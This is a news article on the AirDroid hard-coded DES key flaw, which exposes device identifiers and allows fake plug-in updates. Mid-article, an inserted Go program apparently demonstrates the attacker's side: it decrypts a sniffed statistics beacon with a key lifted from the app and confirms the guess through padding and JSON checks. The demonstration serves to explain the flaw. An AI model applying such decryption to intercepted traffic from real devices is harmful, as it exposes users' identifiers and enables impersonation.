Remote management app exposes millions of Android users to hacking

Man-in-the-middle attackers could exploit an AirDroid flaw to execute malicious code on devices

Poor implementation of encryption in a popular Android remote management application exposes millions of users to data theft and remote code execution attacks.

According to researchers from mobile security firm Zimperium, the AirDroid screen sharing and remote control application sends authentication information encrypted with a hard-coded key. This information could allow man-in-the-middle attackers to push out malicious AirDroid add-on updates, which would then gain the permissions of the app itself.

AirDroid has access to a device's contacts, location information, text messages, photos, call logs, dialer, camera, microphone and the contents of the SD card. It can also perform in-app purchases, change system settings, disable the screen lock, change network connectivity and much more.

The app, developed by an outfit called Sand Studio, has been in the Google Play store since 2011 and, according to its developers, has more than 20 million downloads.

While AirDroid uses encrypted HTTPS connections for most of its features, some functionality sends data to remote servers over plain HTTP, the Zimperium researchers said in a blog post. The developers attempted to secure this data using the Data Encryption Standard (DES), but the encryption key is static and hard-coded into the application itself, meaning that anyone who unpacks the APK can retrieve it, the researchers said. Even with a properly managed key, DES's 56-bit key length has been considered inadequate for years; with a key shipped inside the app, the encryption offers no confidentiality at all against anyone who has looked at the binary.

One vulnerable feature involves the collection of statistics, which are sent by the app to a server using DES-encrypted JSON payloads. These payloads include identifiers such as the account_id, androidid, device_id, IMEI, IMSI, logic_key and unique_id.

A hacker in a position to intercept user traffic on a network could sniff AirDroid requests to the statistics-gathering server and use the hard-coded encryption key to decrypt the JSON payload. The account- and device-identifying information inside can then be used to impersonate the device to other servers accessed by the app.
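The following Go program, added here as an illustration and not code from AirDroid, Sand Studio or Zimperium, models the flaw described above: a "client" serialises the identifiers into JSON and DES-encrypts them under a key compiled into the binary, and an "attacker" who has pulled the same key out of the APK decrypts a beacon captured from plain HTTP. The key value, the ECB mode with PKCS#5 padding (the default Java's `Cipher.getInstance("DES")` applies, but an assumption about AirDroid) and all identifier values are constructed for the example. Clean unpadding followed by valid JSON is the check a practitioner uses to confirm that key and mode were guessed right.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// hardcodedKey stands in for the static key baked into the app. The real
// value is not on the page; this one is invented for the demonstration.
var hardcodedKey = []byte("8bytekey")

// StatsPayload carries the identifier fields the article lists in the
// statistics beacon (field names from the article, values constructed).
type StatsPayload struct {
	AccountID string `json:"account_id"`
	AndroidID string `json:"androidid"`
	DeviceID  string `json:"device_id"`
	IMEI      string `json:"imei"`
	IMSI      string `json:"imsi"`
	LogicKey  string `json:"logic_key"`
	UniqueID  string `json:"unique_id"`
}

// pkcs5Pad / pkcs5Unpad: the padding of DES/ECB/PKCS5Padding, Java's default
// for Cipher.getInstance("DES"). That this is AirDroid's mode is an assumption.
func pkcs5Pad(b []byte) []byte {
	n := des.BlockSize - len(b)%des.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs5Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%des.BlockSize != 0 {
		return nil, errors.New("length is not a multiple of the block size")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > des.BlockSize || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// desECB runs single DES over each 8-byte block; encrypt selects direction.
func desECB(key, in []byte, encrypt bool) ([]byte, error) {
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(in)%des.BlockSize != 0 {
		return nil, errors.New("input is not block aligned")
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += des.BlockSize {
		if encrypt {
			block.Encrypt(out[i:i+des.BlockSize], in[i:i+des.BlockSize])
		} else {
			block.Decrypt(out[i:i+des.BlockSize], in[i:i+des.BlockSize])
		}
	}
	return out, nil
}

// EncryptBeacon models the client: JSON-serialise the payload and encrypt it
// under the key compiled into the APK. Hex-encoded for readability.
func EncryptBeacon(key []byte, p StatsPayload) (string, error) {
	plain, err := json.Marshal(p)
	if err != nil {
		return "", err
	}
	ct, err := desECB(key, pkcs5Pad(plain), true)
	if err != nil {
		return "", err
	}
	return hex.EncodeToString(ct), nil
}

// DecryptBeacon models the attacker: the same key, lifted from the APK, turns a
// beacon sniffed from plain HTTP back into the device identifiers. Padding that
// unwraps cleanly and parses as JSON confirms that key and mode are right.
func DecryptBeacon(key []byte, hexCT string) (StatsPayload, error) {
	var p StatsPayload
	ct, err := hex.DecodeString(hexCT)
	if err != nil {
		return p, err
	}
	padded, err := desECB(key, ct, false)
	if err != nil {
		return p, err
	}
	plain, err := pkcs5Unpad(padded)
	if err != nil {
		return p, err
	}
	if !json.Valid(plain) {
		return p, errors.New("decrypted bytes are not JSON: wrong key or mode")
	}
	return p, json.Unmarshal(plain, &p)
}

func main() {
	// Constructed sample identifiers; nothing here comes from a real device.
	sample := StatsPayload{AccountID: "acct-0001", AndroidID: "a1b2c3d4e5f60718",
		DeviceID: "dev-42", IMEI: "490154203237518", IMSI: "310150123456789",
		LogicKey: "lk-demo", UniqueID: "uid-demo"}
	wire, err := EncryptBeacon(hardcodedKey, sample)
	if err != nil {
		panic(err)
	}
	fmt.Println("sniffed beacon (hex):", wire)
	recovered, err := DecryptBeacon(hardcodedKey, wire) // attacker side
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered identifiers: %+v\n", recovered)
}
```

The point of the round trip is that nothing the "attacker" needs is secret: the key is in every copy of the app, so every beacon on every network decrypts the same way. A wrong key fails the padding or JSON check, which is also how one would confirm a captured payload really belongs to the app under analysis.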

"Having this information, the attacker can now impersonate the victim’s device and perform various HTTP or HTTPS requests on its behalf to the AirDroid API endpoints," the Zimperium researchers said.

For example, a man-in-the-middle attacker could redirect requests to the server used to check for AirDroid plug-in updates and then inject a fake update into the response. The user would be notified that an update is available and would likely install it, giving the malicious code access to AirDroid's permissions.

The Zimperium researchers claim that they notified the AirDroid developers about the problem in May and were informed in September about an upcoming update. New versions of AirDroid, 4.0.0 and 4.0.1, were released in November, but they're still vulnerable, according to Zimperium, so the researchers decided to make the vulnerability public.

An update that will fix this issue is expected to start rolling out within the next two weeks, said Betty Chen, chief marketing officer of Sand Studio, via email. The "boutique" development team needed time to develop the solution and synchronize the code of all its clients for different platforms and servers before starting to deploy the new encryption solution, which is not compatible with previous versions, she said.

There was some miscommunication, as the date the company gave out to Zimperium was for the release of AirDroid 4.0, which makes some related changes, but not the actual fix.

This is not the first time a serious vulnerability has been found in AirDroid. In April 2015, a researcher found that he could take over an Android device with AirDroid installed by simply sending a malicious link to the user via SMS. In February, researchers from Check Point found a way to exploit AirDroid to steal data from devices via maliciously crafted contact cards (vCards).

The Zimperium researchers recommend disabling or uninstalling the app until a fix for the latest issue is made available.

Lucian Constantin

IDG News Service